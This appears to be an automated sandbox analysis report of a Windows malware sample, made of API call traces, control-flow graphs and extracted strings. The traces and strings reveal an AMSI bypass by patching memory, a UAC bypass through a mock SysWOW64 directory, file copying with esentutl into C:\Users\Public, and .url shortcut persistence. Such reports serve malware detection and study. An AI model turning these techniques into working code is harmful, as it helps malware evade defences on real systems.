                                                                                                                      • Part of subcall function 02DADC8C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02DADD3B
                                                                                                                    • Sleep.KERNEL32(000003E8,ScanBuffer,02E17380,02DBB7B8,UacScan,02E17380,02DBB7B8,ScanString,02E17380,02DBB7B8,02DBBB30,00000000,00000000,02DBBB24,00000000,00000000), ref: 02DB40CB
                                                                                                                      • Part of subcall function 02DA88B8: LoadLibraryW.KERNEL32(amsi), ref: 02DA88C1
                                                                                                                      • Part of subcall function 02DA88B8: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02DA8920
                                                                                                                    • Sleep.KERNEL32(000003E8,ScanBuffer,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,UacScan,02E17380,02DBB7B8,000003E8,ScanBuffer,02E17380,02DBB7B8,UacScan,02E17380), ref: 02DB4277
                                                                                                                      • Part of subcall function 02DA894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02E173A8,02DAA587,ScanString,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,Initialize,02E173A8,02DAA93C,UacScan), ref: 02DA8960
                                                                                                                      • Part of subcall function 02DA894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DA897A
                                                                                                                      • Part of subcall function 02DA894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02E173A8,02DAA587,ScanString,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,Initialize), ref: 02DA89B6
                                                                                                                    • Sleep.KERNEL32(00004E20,UacScan,02E17380,02DBB7B8,ScanString,02E17380,02DBB7B8,ScanBuffer,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,UacInitialize,02E17380,02DBB7B8), ref: 02DB50EE
                                                                                                                      • Part of subcall function 02DADC04: RtlI.N(?,?,00000000,02DADC7E), ref: 02DADC2C
                                                                                                                      • Part of subcall function 02DADC04: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02DADC7E), ref: 02DADC42
                                                                                                                      • Part of subcall function 02DADC04: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02DADC7E), ref: 02DADC61
                                                                                                                      • Part of subcall function 02D97E5C: GetFileAttributesA.KERNEL32(00000000,?,02DB041F,ScanString,02E17380,02DBB7B8,OpenSession,02E17380,02DBB7B8,ScanString,02E17380,02DBB7B8,UacScan,02E17380,02DBB7B8,UacInitialize), ref: 02D97E67
                                                                                                                      • Part of subcall function 02DA85BC: WinExec.KERNEL32(?,?), ref: 02DA8624
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                                                                    • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                                                    • API String ID: 2171786310-3926298568
                                                                                                                    • Opcode ID: 98a1256599eb019ceab753adad2fbdeaea345acb534cf2514b4cc25cb01ab90e
                                                                                                                    • Instruction ID: 502b9a8d99e43e62eae28f1d9a8749281bd5058f743a7e1c669ddc359a9d8a58
                                                                                                                    • Opcode Fuzzy Hash: 98a1256599eb019ceab753adad2fbdeaea345acb534cf2514b4cc25cb01ab90e
                                                                                                                    • Instruction Fuzzy Hash: EB431835A4025C9FDF21EB64DC90EDE73B6FF89304F5041E6A409AB715CA30AE868F61

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 10970 2dae678-2dae67c 10971 2dae681-2dae686 10970->10971 10971->10971 10972 2dae688-2daec81 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94740 * 2 call 2d94860 call 2d94778 call 2d930d4 call 2d946d4 * 2 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94740 call 2d97f2c call 2d949a0 call 2d94d74 call 2d94df0 call 2d94740 call 2d949a0 call 2d94d74 call 2d94df0 call 2da8788 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d947ec call 2d949a0 call 2da894c call 2d94860 call 2d949a0 call 2d947ec call 2d949a0 call 2da894c call 2d94860 call 2d949a0 call 2d947ec call 2d949a0 call 2da894c call 2d94860 call 2d949a0 call 2d947ec call 2d949a0 call 2da894c 10971->10972 11175 2daeee2-2daef2f call 2d94500 call 2d94c60 call 2d94500 call 2d94c60 call 2d94500 10972->11175 11176 2daec87-2daeedd call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 call 2d94860 call 2d949a0 call 2d946d4 call 2d947ec call 2d949a0 call 2d946d4 call 2da89d0 WaitForSingleObject CloseHandle * 2 call 2d94860 call 2d949a0 call 2d947ec call 2d949a0 call 2da894c call 2d94860 call 2d949a0 call 2d947ec call 2d949a0 call 2da894c call 2d94860 call 2d949a0 call 2d947ec call 2d949a0 call 2da894c call 2d94860 call 2d949a0 call 2d947ec call 2d949a0 call 2da894c * 3 10972->11176 11176->11175
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02DA89D0: FreeLibrary.KERNEL32(74AD0000,00000000,00000000,00000000,00000000,02E1738C,Function_0000662C,00000004,02E1739C,02E1738C,05F5E103,00000040,02E173A0,74AD0000,00000000,00000000), ref: 02DA8AAA
                                                                                                                      • Part of subcall function 02DA8788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DA8814
                                                                                                                      • Part of subcall function 02DA894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02E173A8,02DAA587,ScanString,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,Initialize,02E173A8,02DAA93C,UacScan), ref: 02DA8960
                                                                                                                      • Part of subcall function 02DA894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02DA897A
                                                                                                                      • Part of subcall function 02DA894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02E173A8,02DAA587,ScanString,02E173A8,02DAA93C,ScanBuffer,02E173A8,02DAA93C,Initialize), ref: 02DA89B6
                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02E17380,02DAEF4C,OpenSession,02E17380,02DAEF4C,UacScan,02E17380,02DAEF4C,ScanBuffer,02E17380,02DAEF4C,OpenSession,02E17380), ref: 02DAED6E
                                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02E17380,02DAEF4C,OpenSession,02E17380,02DAEF4C,UacScan,02E17380,02DAEF4C,ScanBuffer,02E17380,02DAEF4C,OpenSession), ref: 02DAED76
                                                                                                                    • CloseHandle.KERNEL32(00000870,00000000,00000000,000000FF,ScanString,02E17380,02DAEF4C,OpenSession,02E17380,02DAEF4C,UacScan,02E17380,02DAEF4C,ScanBuffer,02E17380,02DAEF4C), ref: 02DAED7F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                                                                    • String ID: )"C:\Users\Public\Libraries\lxsyrsiW.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                                                                    • API String ID: 3475578485-1053911981
                                                                                                                    • Opcode ID: 3a2ffb623bd17301f5bea1fa3dbeba153719c74835a5dcd749a6512f6cb0a1e1
                                                                                                                    • Instruction ID: 9efac59e9d14dc5bb8636f99ae115b07da0a2d3778c8898243c25efff7f28991
                                                                                                                    • Opcode Fuzzy Hash: 3a2ffb623bd17301f5bea1fa3dbeba153719c74835a5dcd749a6512f6cb0a1e1
                                                                                                                    • Instruction Fuzzy Hash: A622D735A0015D9FEF10EBA4D891FCEB3BAEF85304F5041A5A409AB355DB30AE46CF66

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 13139 2d91724-2d91736 13140 2d91968-2d9196d 13139->13140 13141 2d9173c-2d9174c 13139->13141 13142 2d91a80-2d91a83 13140->13142 13143 2d91973-2d91984 13140->13143 13144 2d9174e-2d9175b 13141->13144 13145 2d917a4-2d917ad 13141->13145 13151 2d91a89-2d91a8b 13142->13151 13152 2d91684-2d916ad VirtualAlloc 13142->13152 13148 2d91938-2d91945 13143->13148 13149 2d91986-2d919a2 13143->13149 13146 2d9175d-2d9176a 13144->13146 13147 2d91774-2d91780 13144->13147 13145->13144 13150 2d917af-2d917bb 13145->13150 13155 2d9176c-2d91770 13146->13155 13156 2d91794-2d917a1 13146->13156 13158 2d917f0-2d917f9 13147->13158 13159 2d91782-2d91790 13147->13159 13148->13149 13157 2d91947-2d9195b Sleep 13148->13157 13160 2d919b0-2d919bf 13149->13160 13161 2d919a4-2d919ac 13149->13161 13150->13144 13162 2d917bd-2d917c9 13150->13162 13153 2d916df-2d916e5 13152->13153 13154 2d916af-2d916dc call 2d91644 13152->13154 13154->13153 13157->13149 13164 2d9195d-2d91964 Sleep 13157->13164 13169 2d917fb-2d91808 13158->13169 13170 2d9182c-2d91836 13158->13170 13166 2d919d8-2d919e0 13160->13166 13167 2d919c1-2d919d5 13160->13167 13165 2d91a0c-2d91a22 13161->13165 13162->13144 13168 2d917cb-2d917de Sleep 13162->13168 13164->13148 13176 2d91a3b-2d91a47 13165->13176 13177 2d91a24-2d91a32 13165->13177 13173 2d919fc-2d919fe call 2d915cc 13166->13173 13174 2d919e2-2d919fa 13166->13174 13167->13165 13168->13144 13172 2d917e4-2d917eb Sleep 13168->13172 13169->13170 13175 2d9180a-2d9181e Sleep 13169->13175 13178 2d918a8-2d918b4 13170->13178 13179 2d91838-2d91863 13170->13179 13172->13145 13187 2d91a03-2d91a0b 13173->13187 13174->13187 13175->13170 13189 2d91820-2d91827 Sleep 13175->13189 13183 2d91a49-2d91a5c 13176->13183 13184 2d91a68 13176->13184 13177->13176 13180 2d91a34 13177->13180 13185 2d918dc-2d918eb call 2d915cc 13178->13185 13186 2d918b6-2d918c8 13178->13186 13181 2d9187c-2d9188a 13179->13181 13182 2d91865-2d91873 13179->13182 13180->13176 13191 2d918f8 13181->13191 13192 2d9188c-2d918a6 call 2d91500 13181->13192 13182->13181 13190 2d91875 13182->13190 13193 2d91a6d-2d91a7f 13183->13193 13194 2d91a5e-2d91a63 call 2d91500 13183->13194 13184->13193 13200 2d918fd-2d91936 13185->13200 13204 2d918ed-2d918f7 13185->13204 13195 2d918ca 13186->13195 13196 2d918cc-2d918da 13186->13196 13189->13169 13190->13181 13191->13200 13192->13200 13194->13193 13195->13196 13196->13200
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(00000000,?,02D92000), ref: 02D917D0
                                                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,02D92000), ref: 02D917E6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3472027048-0
                                                                                                                    • Opcode ID: 649f0179f37311b7d03ab4f2874f66ad9b08b356d3c1640e3213689a23848f01
                                                                                                                    • Instruction ID: b3e137b0220a6332c216582ee5bf7fc0d841b42ee1589204c80567730bcfee17
                                                                                                                    • Opcode Fuzzy Hash: 649f0179f37311b7d03ab4f2874f66ad9b08b356d3c1640e3213689a23848f01
                                                                                                                    • Instruction Fuzzy Hash: D1B111B2A402528FCF16CF29D884355BBE1EF86315F5986BAE4598B3C5C770DC91CBA0

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • LoadLibraryW.KERNEL32(amsi), ref: 02DA88C1
                                                                                                                      • Part of subcall function 02DA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
                                                                                                                      • Part of subcall function 02DA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
                                                                                                                      • Part of subcall function 02DA8274: GetProcAddress.KERNEL32(?,?), ref: 02DA82D9
                                                                                                                      • Part of subcall function 02DA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02DA7DEC
                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02DA8920
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                                    • String ID: DllGetClassObject$W$amsi
                                                                                                                    • API String ID: 941070894-2671292670
                                                                                                                    • Opcode ID: bbb517804a211cc1f3cdea4ddeeb4c03e31a4984d08dee6a9968a66eb658bbcf
                                                                                                                    • Instruction ID: 4c8c00b96a1abb8291488a0affc4c106a31fab80c16cff38fe97a3e18de2ad98
                                                                                                                    • Opcode Fuzzy Hash: bbb517804a211cc1f3cdea4ddeeb4c03e31a4984d08dee6a9968a66eb658bbcf
                                                                                                                    • Instruction Fuzzy Hash: 05F0AF6154C381BAE700E3748C59F4FBECD8B62264F008A58F1E8AA3D2D679D5059BB7

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 13227 2d91a8c-2d91a9b 13228 2d91b6c-2d91b6f 13227->13228 13229 2d91aa1-2d91aa5 13227->13229 13230 2d91c5c-2d91c60 13228->13230 13231 2d91b75-2d91b7f 13228->13231 13232 2d91b08-2d91b11 13229->13232 13233 2d91aa7-2d91aae 13229->13233 13239 2d916e8-2d9170b call 2d91644 VirtualFree 13230->13239 13240 2d91c66-2d91c6b 13230->13240 13235 2d91b3c-2d91b49 13231->13235 13236 2d91b81-2d91b8d 13231->13236 13232->13233 13234 2d91b13-2d91b27 Sleep 13232->13234 13237 2d91adc-2d91ade 13233->13237 13238 2d91ab0-2d91abb 13233->13238 13234->13233 13241 2d91b2d-2d91b38 Sleep 13234->13241 13235->13236 13242 2d91b4b-2d91b5f Sleep 13235->13242 13244 2d91b8f-2d91b92 13236->13244 13245 2d91bc4-2d91bd2 13236->13245 13248 2d91ae0-2d91af1 13237->13248 13249 2d91af3 13237->13249 13246 2d91abd-2d91ac2 13238->13246 13247 2d91ac4-2d91ad9 13238->13247 13256 2d9170d-2d91714 13239->13256 13257 2d91716 13239->13257 13241->13232 13242->13236 13253 2d91b61-2d91b68 Sleep 13242->13253 13252 2d91b96-2d91b9a 13244->13252 13251 2d91bd4-2d91bd9 call 2d914c0 13245->13251 13245->13252 13248->13249 13250 2d91af6-2d91b03 13248->13250 13249->13250 13250->13231 13251->13252 13258 2d91bdc-2d91be9 13252->13258 13259 2d91b9c-2d91ba2 13252->13259 13253->13235 13262 2d91719-2d91723 13256->13262 13257->13262 13258->13259 13261 2d91beb-2d91bf2 call 2d914c0 13258->13261 13263 2d91bf4-2d91bfe 13259->13263 13264 2d91ba4-2d91bc2 call 2d91500 13259->13264 13261->13259 13266 2d91c2c-2d91c59 call 2d91560 13263->13266 13267 2d91c00-2d91c28 VirtualFree 13263->13267
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNEL32(00000000,?), ref: 02D91B17
                                                                                                                    • Sleep.KERNEL32(0000000A,00000000,?), ref: 02D91B31
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3472027048-0
                                                                                                                    • Opcode ID: 0fc7d9fdd3baca524b9834a44564930ad22083456d2786db29a5011eafb2f407
                                                                                                                    • Instruction ID: ab8d8780649605aa0118af68ea9ab2381d1f7aabd85872230fb9b93218304263
                                                                                                                    • Opcode Fuzzy Hash: 0fc7d9fdd3baca524b9834a44564930ad22083456d2786db29a5011eafb2f407
                                                                                                                    • Instruction Fuzzy Hash: 2951DE716452428FDF16DF68C984766BBE1EF46318F5885AEE4488B3C2E770CC85CBA1

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02DAE5F6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CheckConnectionInternet
                                                                                                                    • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                    • API String ID: 3847983778-3852638603
                                                                                                                    • Opcode ID: bc8efc7a66d77190942c1c649c9aba2946349221d11cb6fe77b3e02439f03c0e
                                                                                                                    • Instruction ID: 9defdbcbb801e93cb19bdb844b2fb2bbb873a6554cad06d711ad1aeaf05fb3bc
                                                                                                                    • Opcode Fuzzy Hash: bc8efc7a66d77190942c1c649c9aba2946349221d11cb6fe77b3e02439f03c0e
                                                                                                                    • Instruction Fuzzy Hash: 3F412A35A10148AFEF10EBA8D850EDEB3BAEF88704F604835F041A7352DA74AD06CF65
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02DA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DA823C,?,?,00000000,?,02DA7A7E,ntdll,00000000,00000000,02DA7AC3,?,?,00000000), ref: 02DA820A
                                                                                                                      • Part of subcall function 02DA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DA821E
                                                                                                                      • Part of subcall function 02DA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
                                                                                                                      • Part of subcall function 02DA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
                                                                                                                      • Part of subcall function 02DA8274: GetProcAddress.KERNEL32(?,?), ref: 02DA82D9
                                                                                                                    • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02DA8814
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                                    • String ID: CreateProcessAsUserW$Kernel32
                                                                                                                    • API String ID: 3130163322-2353454454
                                                                                                                    • Opcode ID: e5e3f140b68d1b79469f0d0df75a2f8707ac04df2f05902bf5aafd074c54de45
                                                                                                                    • Instruction ID: 3c39ab46b5551adef8d681d43b57b44f86e2acf9e71319207ecc6b0f78af7e0b
                                                                                                                    • Opcode Fuzzy Hash: e5e3f140b68d1b79469f0d0df75a2f8707ac04df2f05902bf5aafd074c54de45
                                                                                                                    • Instruction Fuzzy Hash: 2811D3B2680248AFEB40EFA9EC51F9A77EDEB0CB00F914420BA08D3300C634ED519B24
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02DA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DA823C,?,?,00000000,?,02DA7A7E,ntdll,00000000,00000000,02DA7AC3,?,?,00000000), ref: 02DA820A
                                                                                                                      • Part of subcall function 02DA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DA821E
                                                                                                                      • Part of subcall function 02DA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
                                                                                                                      • Part of subcall function 02DA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
                                                                                                                      • Part of subcall function 02DA8274: GetProcAddress.KERNEL32(?,?), ref: 02DA82D9
                                                                                                                    • WinExec.KERNEL32(?,?), ref: 02DA8624
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.2139209376.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D90000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.2139133097.0000000002D90000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002E17000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.2140182815.0000000002F0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2d90000_x.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleModule$AddressProc$Exec
                                                                                                                    • String ID: Kernel32$WinExec
                                                                                                                    • API String ID: 2292790416-3609268280
                                                                                                                    • Opcode ID: 462da612556021a648a9e664b87565c3aecc8e413b208139c27864a234f94a85
                                                                                                                    • Instruction ID: 5a5e9ccb511019f4a29cf65a6af8165746fa16e66c2af735193a87d0736a9e04
                                                                                                                    • Opcode Fuzzy Hash: 462da612556021a648a9e664b87565c3aecc8e413b208139c27864a234f94a85
                                                                                                                    • Instruction Fuzzy Hash: 6C016974A84244BFEB00EFA9EC22F5AB7E9E709B00F908420B900D2740D770AD11AA24
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02DA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02DA823C,?,?,00000000,?,02DA7A7E,ntdll,00000000,00000000,02DA7AC3,?,?,00000000), ref: 02DA820A
                                                                                                                      • Part of subcall function 02DA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02DA821E
                                                                                                                      • Part of subcall function 02DA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DA82FC,?,?,00000000,00000000,?,02DA8215,00000000,KernelBASE,00000000,00000000,02DA823C), ref: 02DA82C1
                                                                                                                      • Part of subcall function 02DA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02DA82C7
                                                                                                                      • Part of subcall function 02DA8274: GetProcAddress.KERNEL32(?,?), ref: 02DA82D9
                                                                                                                    • WinExec.KERNEL32(?,?), ref: 02DA8624
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
